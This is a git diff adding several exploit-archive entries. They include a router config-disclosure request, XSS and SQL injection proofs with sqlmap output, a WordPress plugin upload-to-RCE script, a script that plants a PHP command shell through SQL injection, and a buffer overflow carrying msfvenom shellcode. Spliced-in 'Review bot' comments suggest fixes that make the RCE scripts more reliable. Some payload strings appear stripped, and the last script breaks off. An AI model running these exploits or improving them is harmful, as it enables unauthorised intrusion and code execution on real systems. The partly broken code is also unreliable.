diff --git a/exploits/hardware/remote/51129.txt b/exploits/hardware/remote/51129.txt new file mode 100644 index 000000000..8fd055cae --- /dev/null +++ b/exploits/hardware/remote/51129.txt @@ -0,0 +1,46 @@ +# Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure +# Date: 2022-11-10 +# Exploit Author: Aryan Chehreghani +# Vendor Homepage: https://www.dlink.com +# Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09 +# Firmware Version: ME_1.00 +# Tested on: Windows 11 + +# [ Details - DSL-124 ]: +#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office, +#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection, +#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports, +#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet. + +# [ Description ]: +#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system, +#and in response to sending this request, she receives a complete backup of the router settings, +#In fact this happens because of the lack of management of users and sessions in the network. + +# [ POC ]: + +Request : + +curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgi + +Response : + +HTTP/1.1 200 OK +Connection: close +Server: Virtual Web 0.9 +Content-Type: application/octet-stream; +Content-Disposition: attachment;filename="config.img" +Pragma: no-cache +Cache-Control: no-cache + + + + + + + + +. +. +. + \ No newline at end of file diff --git a/exploits/hardware/webapps/51130.txt b/exploits/hardware/webapps/51130.txt new file mode 100644 index 000000000..e28b822fd --- /dev/null +++ b/exploits/hardware/webapps/51130.txt 
@@ -0,0 +1,44 @@ +# Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS) +# Author: Bleron Rrustemi +# Discovery Date: 2022-11-15 +# Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/ +# Datasheet:: https://www.uniview.com/download.do?id=1761643 +# Device Firmware: NVR-B3801.20.15.200829 +# Tested Version: NVR301-04S2-P4 +# Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit) +# Vulnerability Type: Reflected Cross-Site Scripting (XSS) +# CVE: N/A + + + + + +# Proof of Concept: + +IP=IP of the device + +http://IP/LAPI/V1.0/System/Security/Login/"> + + + +Best regards, + +Bleron Rrustemi +Chief Technology Officer +Direct: +383 (0) 49 955 503 +E-mail: bleron@drugeza.com + + + + + +Drugëza SHPK +Rr. Lekë Dukagjini p.n +Prishtinë, 10000 • Kosovo +Tel.: +383 49 955 503 +www.drugeza.com + + + + +ü Be GREEN, keep it on the SCREEN \ No newline at end of file diff --git a/exploits/php/webapps/51122.py b/exploits/php/webapps/51122.py new file mode 100755 index 000000000..8e6177e2f --- /dev/null +++ b/exploits/php/webapps/51122.py 
@@ -0,0 +1,285 @@ +# Exploit Title: WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated) +# Date: 11/05/2022 +# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec) +# Vendor Homepage: https://www.wpallimport.com/ +# Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ (scroll down to select the version) +# Version: <= 3.6.7 (tested: 3.6.7) +# Tested on: WordPress 6.1 (os-independent since this exploit does NOT provide the payload) +# CVE: CVE-2022-1565 + +#!/usr/bin/python +import requests +import re +import os + +# WARNING: This exploit does NOT include the payload. +# Also, be sure you already have some valid admin credentials. This exploit needs an administrator account in order to work. +# If a file with the same name as the payload is already on the server, the upload will OVERWRITE it +# +# Please notice that I'm NOT the researcher who found this vulnerability + +# # # # # VULNERABILITY DESCRIPTION # # # # # +# The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7. +# This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible. + +# # # # # HOW THE EXPLOIT WORKS # # # # # +# 1. Prepare the zip file: +# - create a PHP file with your payload (e.g. rerverse shell) +# - set the variable "payload_file_name" with the name of this file (e.g. "shell.php") +# - create a zip file with the payload +# - set the variable "zip_file_to_upload" with the PATH of this file (e.g. "/root/shell.zip") +# +# 2. 
Login using an administrator account: +# - set the variable "target_url" with the base URL of the target (do NOT end the string with the slash /) +# - set the variable "admin_user" with the username of an administrator account +# - set the variable "admin_pass" with the password of an administrator account +# +# 3. Get the wpnonce using the get_wpnonce_upload_file() method +# - there are actually 2 types of wpnonce: +# - the first wpnonce will be retrieved using the method retrieve_wpnonce_edit_settings() inside the PluginSetting class. +# This wpnonce allows us to change the plugin settings (check the step 4) +# - the second wpnonce will be retrieved using the method retrieve_wpnonce_upload_file() inside the PluginSetting class. +# This wpnonce allows us to upload the file +# +# 4. Check if the plugin secure mode is enabled using the method check_if_secure_mode_is_enabled() inside the PluginSetting class +# - if the Secure Mode is enabled, the zip content will be put in a folder with a random name. +# The exploit will disable the Secure Mode. +# By disabling the Secure Mode, the zip content will be put in the main folder (check the variable payload_url). +# The method called to enable and disable the Secure Mode is set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) +# - if the Secure Mode is NOT enabled, the exploit will upload the file but then it will NOT enable the Secure Mode. +# +# 5. Upload the file using the upload_file(wpnonce_upload_file: str) method +# - after the upload, the server should reply with HTTP 200 OK but it doesn't mean the upload was completed successfully. +# The response will contain a JSON that looks like this: +# {"jsonrpc":"2.0","error":{"code":102,"message":"Please verify that the file you uploading is a valid ZIP file."},"is_valid":false,"id":"id"} +# As you can see, it says that there's an error with code 102 but, according to the tests I've done, the upload is completed +# +# 6. 
Re-enable the Secure Mode if it was enabled using the switch_back_to_secure_mode() method +# +# 7. Activate the payload using the activate_payload() method +# - you can define a method to activate the payload. +# There reason behind this choice is that this exploit does NOT provide any payload. +# Since you can use a custom payload, you may want to activate it using an HTTP POST request instead of a HTTP GET request, or you may want to pass parameters + +# # # # # WHY DOES THE EXPLOIT DISABLE THE SECURE MODE? # # # # # +# According to the PoC of this vulnerability provided by WPSCAN, we should be able to retrieve the uploaded files by visiting the "MAnaged Imports page" +# I don't know why but, after the upload of any file, I couldn't see the uploaded file in that page (maybe the Pro version is required?) +# I had to find a workaround and so I did, by exploiting this option. +# WPSCAN Page: https://wpscan.com/vulnerability/578093db-a025-4148-8c4b-ec2df31743f7 + +# # # # # ANY PROBLEM WITH THE EXPLOIT? # # # # # +# In order for the exploit to work please consider the following: +# 1. check the target_url and the admin credentials +# 2. check the path of the zip file and the name of the payload (they can be different) +# 3. if you're testing locally, try to set verify_ssl_certificate on False +# 4. you can use print_response(http_response) to investigate further + +# Configure the following variables: +target_url = "https://vulnerable.wp/wordpress" # Target base URL +admin_user = "admin" # Administrator username +admin_pass = "password" # Administrator password +zip_file_to_upload = "/shell.zip" # Path to the ZIP file (e.g /root/shell.zip) +payload_file_name = "shell.php" # Filename inside the zip file (e.g. shell.php). This file will be your payload (e.g. reverse shell) +verify_ssl_certificate = True # If True, the script will exit if the SSL Certificate is NOT valid. You can set it on False while testing locally, if needed. 
+ +# Do NOT change the following variables +wp_login_url = target_url + "/wp-login.php" # WordPress login page +wp_all_import_page_settings = target_url + "/wp-admin/admin.php?page=pmxi-admin-settings" # Plugin page settings +payload_url = target_url + "/wp-content/uploads/wpallimport/uploads/" + payload_file_name # Payload will be uploaded here +re_enable_secure_mode = False +session = requests.Session() + +# This class helps to retrieve plugin settings, including the nonce(s) used to change settings and upload files. +class PluginSetting: + # Regular Expression patterns + pattern_setting_secure_mode = r' + regex_search = re.search(self.pattern_setting_secure_mode, self.http_response.text) + if not regex_search: + print("Something went wrong: could not retrieve plugin settings. Are you an administrator?") + # print_response(self.http_response) # for debugging + exit() + self.is_secure_mode_enabled = "checked" in regex_search.group() + + def retrieve_wpnonce_edit_settings(self): + # You can find this wpnonce in the source file by searching for the following input hidden: + # + # 052e2438f9 would be the wpnonce for editing the settings + regex_search = re.search(self.pattern_wpnonce_edit_settings, self.http_response.text) + if not regex_search: + print("Something went wrong: could not retrieve _wpnonce_edit-settings parameter. 
Are you an administrator?") + # print_response(self.http_response) # for debugging + exit() + + self.wpnonce_edit_settings = regex_search.group(1) + + def retrieve_wpnonce_upload_file(self): + # You can find this wpnonce in the source file by searching for the following javascript variable: var wp_all_import_security = 'dee75fdb8b'; + # dee75fdb8b would be the wpnonce for the upload + regex_search = re.search(self.pattern_wpnonce_upload_file, self.http_response.text) + if not regex_search: + print("Something went wrong: could not retrieve the upload wpnonce from wp_all_import_security variable") + # print_response(self.http_response) # for debugging + exit() + + self.wpnonce_upload_file = regex_search.group(1) + +def wp_login(): + global session + data = { "log" : admin_user, "pwd" : admin_pass, "wp-submit" : "Log in", "redirect_to" : wp_all_import_page_settings, "testcookie" : 1 } + login_cookie = { "wordpress_test_cookie" : "WP Cookie check" } + + # allow_redirects is set to False because, when credentials are correct, wordpress replies with 302 found. + # Looking for this HTTP Response Code makes it easier to tell whether the credentials were correct or not + print("Trying to login...") + response = session.post(url=wp_login_url, data=data, cookies=login_cookie, allow_redirects=False, verify=verify_ssl_certificate) + + if response.status_code == 302: + print("Logged in successfully!") + return + + # print_response(response) # for debugging + print("Login failed. 
If the credentials are correct, try to print the response to investigate further.") + exit() + +def set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) -> requests.Response: + global session + if set_to_enabled: + print("Enabling secure mode...") + else: + print("Disabling secure mode...") + + print("Edit settings wpnonce value: " + wpnonce) + data = { "secure" : (1 if set_to_enabled else 0), "_wpnonce_edit-settings" : wpnonce, "_wp_http_referer" : wp_all_import_page_settings, "is_settings_submitted" : 1 } + response = session.post(url=wp_all_import_page_settings, data=data, verify=verify_ssl_certificate) + + if response.status_code == 403: + print("Something went wrong: HTTP Status code is 403 (Forbidden). Wrong wpnonce?") + # print_response(response) # for debugging + exit() + return response + +def switch_back_to_secure_mode(): + global session + + print("Re-enabling secure mode...") + response = session.get(url=wp_all_import_page_settings) + plugin_setting = PluginSetting(response) + + if plugin_setting.is_secure_mode_enabled: + print("Secure mode is already enabled") + return + + response = set_plugin_secure_mode(set_to_enabled=True,wpnonce=plugin_setting.wpnonce_edit_settings) + new_plugin_setting = PluginSetting(response) + if not new_plugin_setting.is_secure_mode_enabled: + print("Something went wrong: secure mode has not been re-enabled") + # print_response(response) # for debugging + exit() + print("Secure mode has been re-enabled!") + +def get_wpnonce_upload_file() -> str: + global session, re_enable_secure_mode + # If Secure Mode is enabled, the exploit tries to disable it, then returns the wpnonce for the upload + # If Secure Mode is already disabled, it just returns the wpnonce for the upload + + print("Checking if secure mode is enabled...") + response = session.get(url=wp_all_import_page_settings) + plugin_setting = PluginSetting(response) + + if not plugin_setting.is_secure_mode_enabled: + re_enable_secure_mode = False + print("Insecure mode 
is already enabled!") + return plugin_setting.wpnonce_upload_file + + print("Secure mode is enabled. The script will disable secure mode for the upload, then it will be re-enabled.") + response = set_plugin_secure_mode(set_to_enabled=False, wpnonce=plugin_setting.wpnonce_edit_settings) + + new_plugin_setting = PluginSetting(response) + + if new_plugin_setting.is_secure_mode_enabled: + print("Something went wrong: secure mode has not been disabled") + # print_response(response) # for debugging + exit() + + print("Secure mode has been disabled!") + re_enable_secure_mode = True + return new_plugin_setting.wpnonce_upload_file + +def upload_file(wpnonce_upload_file: str): + global session + + print("Uploading file...") + print("Upload wpnonce value: " + wpnonce_upload_file) + + zip_file_name = os.path.basename(zip_file_to_upload) + upload_url = wp_all_import_page_settings + "&action=upload&_wpnonce=" + wpnonce_upload_file + files = { "async-upload" : (zip_file_name, open(zip_file_to_upload, 'rb'))} + data = { "name" : zip_file_name } + response = session.post(url=upload_url, files=files, data=data) + + if response.status_code == 200: + print("Server replied with HTTP 200 OK. The upload should be completed.") + print("Payload should be here: " + payload_url) + print("If you can't find the payload at this URL, try to print the response to investigate further") + # print_response(response) # for debugging + return 1 + else: + print("Something went wrong during the upload. 
Try to print the response to investigate further") + # print_response(response) # for debugging + return 0 + +def activate_payload(): + global session + + print("Activating payload...") + response = session.get(url=payload_url) + + if response.status_code != 200: + print("Something went wrong: could not find payload at " + payload_url) + # print_response(response) # for debugging + return + +def print_response(response:requests.Response): + print(response.status_code) + print(response.text) + +# Entry Point +def Main(): + print("Target: " + target_url) + print("Credentials: " + admin_user + ":" + admin_pass) + + # Do the login + wp_login() + + # Retrieve wpnonce for upload. + # It disables Secure Mode if needed, then returns the wpnonce + wpnonce_upload_file = get_wpnonce_upload_file() + + # Upload the file + file_uploaded = upload_file(wpnonce_upload_file) + + # Re-enable Secure Mode if needed + if re_enable_secure_mode: + switch_back_to_secure_mode() + + # Activate the payload + if file_uploaded: + activate_payload() + +Main() \ No newline at end of file diff --git a/exploits/php/webapps/51123.txt b/exploits/php/webapps/51123.txt new file mode 100644 index 000000000..4e3839696 --- /dev/null +++ b/exploits/php/webapps/51123.txt @@ -0,0 +1,18 @@ +# Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS) +# Date: 2022-11-08 +# Exploit Author: Rajeshwar Singh +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip +# Tested on: Windows/XAMPP +########################################################################### + +Payload use = "> + +1. Visit URL http://localhost/bsms_ci/ +2. login with admin Credentials +3. navigate to user Management +4. Click on "Add New System User" +5. Add payload in "Name" input field +6. Click save. +7. Visit http://localhost/bsms_ci/index.php/user +8. XSS payload execute. \ No newline at end of file 
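Review bot: `verify_ssl_certificate` is honored on the login and settings-change posts but not on the `session.get(url=wp_all_import_page_settings)` calls in `switch_back_to_secure_mode()` and `get_wpnonce_upload_file()` or on the `session.post(url=upload_url, ...)` in `upload_file()`, so the flag documented at the top of the file is silently ignored there; setting it once with `session.verify = verify_ssl_certificate` right after `session = requests.Session()` removes the inconsistency. In `upload_file()` the archive is opened with `open(zip_file_to_upload, 'rb')` inside the `files` dict and never closed; wrap the post in `with open(zip_file_to_upload, 'rb') as fh:`. `Main()` echoes the administrator password with `print("Credentials: " + admin_user + ":" + admin_pass)`, which ends up in terminal scrollback and session logs; print the username only. The file is committed as mode 100755 but the `#!/usr/bin/python` line comes after the header comments, where the kernel ignores it, so it should be line 1; 51126.py and 51127.py have the same misplaced shebang and 51133.py has none.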
diff --git a/exploits/php/webapps/51125.txt b/exploits/php/webapps/51125.txt
new file mode 100644
index 000000000..ec6223484
--- /dev/null
+++ b/exploits/php/webapps/51125.txt
@@ -0,0 +1,120 @@ +# Exploit Title: Human Resource Management System - SQL Injection (unauthenticated) +# Date: 08-11-2022 +# Exploit Author: Matthijs van der Vaart (eMVee) +# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip +# Version: 1.0 (Monday, October 10, 2022 - 13:37) +# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0 + +1) Capture the login POST request with Burp Suite or OWASP ZAP + +2) Save the request as "login.req" + +3) Run sqlmap as follows: "sqlmap -r login.req" + +Example login.req + +========== + +POST /controller/login.php HTTP/1.1 + +Host: target + +Cookie: csrf_token_f58f5b43e3803b8c3c224afd706cf0f9927d9fd3c222740171d746d078b1ac9b=h1qG45IggxzwQ/i1lH2zBF7ktvDJT716RNl59LQTkwk=; PHPSESSID=kg0h3kpsbf2r3mnmbmmap2afda + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: application/x-www-form-urlencoded + +Content-Length: 66 + +Origin: https://target + +Referer: https://target/index.php + +Upgrade-Insecure-Requests: 1 + +Sec-Fetch-Dest: document + +Sec-Fetch-Mode: navigate + +Sec-Fetch-Site: same-origin + +Sec-Fetch-User: ?1 + +Te: trailers + +Connection: close + +name=admin%40gmail.com&password=password+&submit=Sign+In + + +========= + + +Output example SQL Injection unauthenticated login page + + +========== + +POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? 
[y/N] n + +sqlmap identified the following injection point(s) with a total of 1143 HTTP(s) requests: + +--- + +Parameter: password (POST) + +Type: boolean-based blind + +Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + +Payload: name=admin@gmail.com&password=password ' RLIKE (SELECT (CASE WHEN (7213=7213) THEN 0x70617373776f726420 ELSE 0x28 END))-- ylOf&submit=Sign In + +Type: error-based + +Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: name=admin@gmail.com&password=password ' OR (SELECT 8513 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(8513=8513,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RBnO&submit=Sign In + +Type: time-based blind + +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: name=admin@gmail.com&password=password ' AND (SELECT 4404 FROM (SELECT(SLEEP(5)))eQTb)-- NTCP&submit=Sign In + +Parameter: name (POST) + +Type: boolean-based blind + +Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + +Payload: name=admin@gmail.com' RLIKE (SELECT (CASE WHEN (2620=2620) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- KlrV&password=password &submit=Sign In + +Type: error-based + +Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: name=admin@gmail.com' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7287=7287,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fSRz&password=password &submit=Sign In + +Type: time-based blind + +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: name=admin@gmail.com' AND (SELECT 8912 FROM (SELECT(SLEEP(5)))NCtJ)-- ennA&password=password &submit=Sign In + +--- + +there were multiple injection points, please select the one to use for following injections: + +[0] place: POST, parameter: name, type: Single quoted 
string (default) + +[1] place: POST, parameter: password, type: Single quoted string + +========== \ No newline at end of file diff --git a/exploits/php/webapps/51132.txt b/exploits/php/webapps/51132.txt new file mode 100644 index 000000000..15d96f404 --- /dev/null +++ b/exploits/php/webapps/51132.txt @@ -0,0 +1,34 @@ +# Exploit Title: Helmet Store Showroom v1.0 - SQL Injection +# Exploit Author: Ameer Hamza +# Date: November 15, 2022 +# Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code +# Tested on: Kali Linux, Apache, Mysql +# Vendor: oretnom23 +# Version: v1.0 +# Exploit Description: +# Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account. + +[+] The username parameter is vulnerable to SQLi in login page +[+] URL --> http://localhost/hss/admin/login.php +[+] Username = ' OR 1=1-- - + + +HTTP REQUEST + + +POST /hss/classes/Login.php?f=login HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 38 +Origin: http://localhost +Connection: close +Referer: http://localhost/hss/admin/login.php +Cookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpa + +username='+OR+1%3D1+--+-&password=1234 \ No newline at end of file diff --git a/exploits/php/webapps/51133.py b/exploits/php/webapps/51133.py new file mode 100755 index 000000000..b2d0c4ed5 --- /dev/null +++ b/exploits/php/webapps/51133.py 
@@ -0,0 +1,43 @@ +# Exploit Title: Revenue Collection System v1.0 - Remote Code Execution (RCE) +# Exploit Author: Joe Pollock +# Date: November 16, 2022 +# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip +# Tested on: Kali Linux, Apache, Mysql +# Vendor: Kapiya +# Version: 1.0 +# Exploit Description: +# Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to +# write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory. +# This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command. +# Ex: python3 rcsv1.py 10.10.14.2 "ls" + +import sys, requests +def main(): + if len(sys.argv) != 3: + print("(+) usage: %s " % sys.argv[0]) + print('(+) eg: %s 192.168.121.103 "ls"' % sys.argv[0]) + sys.exit(-1) + + targetIP = sys.argv[1] + cmd = sys.argv[2] + s = requests.Session() + + # Define obscure filename and command parameter to limit exposure and usage of the RCE. + FILENAME = "youcantfindme.php" + CMDVAR = "ohno" + + # Define the SQL injection string + sqli = """'+UNION+SELECT+"","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME) + + # Write the PHP file to disk using the SQL injection vulnerability + url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli) + r1 = s.get(url1) + + # Execute the user defined command and display the result + url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd) + r2 = s.get(url2) + print(r2.text) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/windows/local/51128.txt b/exploits/windows/local/51128.txt new file mode 100644 index 000000000..3e7932c51 
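Review bot: The response to the injection request `r1 = s.get(url1)` is never inspected, so if the write fails the script still issues the second request and prints whatever the server returns for the missing file; check `r1.status_code` (and ideally the body) and `sys.exit(-1)` before the follow-up, consistent with the usage check at the top of `main()`. Both `s.get` calls lack a `timeout=`, so an unresponsive host hangs the script indefinitely. Nothing removes the file written under `/rates/admin/DBbackup/`, so it persists after the run; the header comment should say so, since that path is the artifact an administrator checking for compromise would look for. The `http://` scheme and `/rates/` prefix are hard-coded in both URL format strings and would be cleaner as parameters.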
--- /dev/null +++ b/exploits/windows/local/51128.txt @@ -0,0 +1,35 @@ +# Exploit Title: Outline V1.6.0 - Unquoted Service Path +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Discovery Date: 2022-11-10 +# Vendor Homepage: https://getoutline.org/ +# Software Link: https://getoutline.org/ +# Tested Version: V1.6.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Microsoft Windows 11 Enterprise +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ + +Outline Updater OutlineServiceSvc C:\Program Files (x86)\Outline\OutlineService.exe +                      Auto + +C:\>sc qc OutlineService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: OutlineService +        TYPE               : 10  WIN32_OWN_PROCESS +        START_TYPE         : 2   AUTO_START +        ERROR_CONTROL      : 1   NORMAL +        BINARY_PATH_NAME   : C:\Program Files (x86)\Outline\OutlineService.exe +         +LOAD_ORDER_GROUP   : +        TAG                : 0 +        DISPLAY_NAME       : OutlineService +        DEPENDENCIES       : +        SERVICE_START_NAME : LocalSystem + +C:\>systeminfo + +OS Name:  Microsoft Windows 11 Enterprise +OS Version: 10.0.22000 N/A Build 22000 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/exploits/windows/remote/51126.py b/exploits/windows/remote/51126.py new file mode 100755 index 000000000..2be9b5cb4 --- /dev/null +++ b/exploits/windows/remote/51126.py 
@@ -0,0 +1,121 @@ +# Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow +# Date: 11/08/2022 +# Exploit Author: a-rey +# Vendor Homepage: http://www.inbit.com/support.html +# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html +# Version: v4.6.0 - v4.9.0 +# Tested on: Windows XP SP3, Windows 7, Windows 10 +# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import sys, socket, struct, argparse, logging + +""" +/opt/metasploit-framework/bin/msfvenom \ + -p windows/messagebox \ + ICON=WARNING \ + TEXT="get wrecked" \ + TITLE="LOLZ" \ + EXITFUNC=thread \ + -f py \ + -v SHELLCODE \ + -e x86/shikata_ga_nai \ + -b '\x3E' +""" +SHELLCODE = b"" +SHELLCODE += b"\xba\xbd\x3d\x03\xfa\xd9\xc9\xd9\x74\x24\xf4" +SHELLCODE += b"\x5b\x31\xc9\xb1\x41\x31\x53\x14\x03\x53\x14" +SHELLCODE += b"\x83\xc3\x04\x5f\xc8\xda\x11\x04\xea\xa9\xc1" +SHELLCODE += b"\xce\x3c\x80\xb8\x59\x0e\xed\xd9\x2e\x01\xdd" +SHELLCODE += b"\xaa\x46\xee\x96\xdb\xba\x65\xee\x2b\x49\x07" +SHELLCODE += b"\xcf\xa0\x7b\xc0\x40\xaf\xf6\xc3\x06\xce\x29" +SHELLCODE += b"\xdc\x58\xb0\x42\x4f\xbf\x15\xdf\xd5\x83\xde" +SHELLCODE += b"\x8b\xfd\x83\xe1\xd9\x75\x39\xfa\x96\xd0\x9e" +SHELLCODE += b"\xfb\x43\x07\xea\xb2\x18\xfc\x98\x44\xf0\xcc" +SHELLCODE += b"\x61\x77\xcc\xd3\x32\xfc\x0c\x5f\x4c\x3c\x43" +SHELLCODE += b"\xad\x53\x79\xb0\x5a\x68\xf9\x62\x8b\xfa\xe0" +SHELLCODE += b"\xe1\x91\x20\xe2\x1e\x43\xa2\xe8\xab\x07\xee" +SHELLCODE += b"\xec\x2a\xf3\x84\x09\xa7\x02\x73\x98\xf3\x20" +SHELLCODE += b"\x9f\xfa\x38\x9a\x97\xd5\x6a\x52\x42\xac\x50" +SHELLCODE += b"\x0d\x03\xe1\x5a\x22\x49\x16\xfd\x45\x91\x19" +SHELLCODE += b"\x88\xff\x6a\x5d\x65\x31\x92\xc1\xfe\xd2\x77" +SHELLCODE += b"\x50\xe8\x65\x88\xab\x17\xf0\x32\x5c\x8f\x6f" +SHELLCODE += b"\xd1\x7c\x0e\x18\x1a\x4f\xbe\xbc\x34\xda\xcd" +SHELLCODE += b"\x59\xb7\x14\xea\x2a\x6b\x71\x06\xa2\x72\x2f" +SHELLCODE += 
b"\xe9\xe1\x7e\x59\xd7\x5a\xc4\xf1\x75\x17\x86" +SHELLCODE += b"\x85\x65\x8c\xa4\x61\xca\x33\xb7\x8d\x9c\x93" +SHELLCODE += b"\x68\x52\x7c\x4c\x25\xdd\x30\xd6\x84\x3a\x40" +SHELLCODE += b"\xba\xc2\xb8\xd9\xa0\x63\xaa\xbc\x42\x2c\x44" +SHELLCODE += b"\x49\xf9\xa9\xf7\xdd\x9a\x54\x8c\x3d\x54\x5e" +SHELLCODE += b"\xe4\x71\xb2\x6b\x7c\x68\x8b\xb9\x14\x5a\xbf" +SHELLCODE += b"\x6c\xbb\x65\xef\xbe\xfb\xc9\xef\x94\xf3" + +BANNER = """\033[0m\033[1;35m +╔═════════════════════════════════════════════════════════════════════╗ +║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote SEH Overflow \033[1;35m║ +╚═════════════════════════════════════════════════════════════════════╝\033[0m + by: \033[1;36m █████╗ ██████╗ ███████╗██╗ ██╗ + \033[1;36m██╔══██╗ ██╔══██╗██╔════╝██║ ██║ + \033[1;36m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝ + \033[1;36m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ + \033[1;36m██║ ██║ ██║ ██║███████╗ ██║ + \033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ +\033[0m""" + +BAD_BYTES = b"\x3e" # > +PAYLOAD_LENGTH = 2000 + +nSEH = b"\xEB\x06\x90\x90" # JMP SHORT 0x8; NOP; NOP +SEH = struct.pack(" None: + pkt = b"<" + pkt += (b"A" * 40) + pkt += nSEH + pkt += SEH + pkt += NULL_ACT_CTX_STUB + pkt += (b"\x90" * 32) # NOP sled for shikata_ga_nai decoder + pkt += SHELLCODE + # NOTE: need to send 1600+ bytes to overwrite beyond top of thread's stack + pkt += (b"B" * (PAYLOAD_LENGTH - len(pkt))) + # NOTE: check for bad bytes + for c in pkt: + if c in BAD_BYTES: + logging.error(f"found bad byte 0x{c:02x} in payload") + sys.exit(-1) + logging.info(f"sending {len(pkt)} byte payload to {targetIp}:{targetPort} ...") + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((targetIp, targetPort)) + s.send(pkt) + s.close() + logging.success("DONE") + +if __name__ == '__main__': + # parse arguments + parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) + parser.add_argument('-t', '--target', help='target IP', type=str, required=True) + 
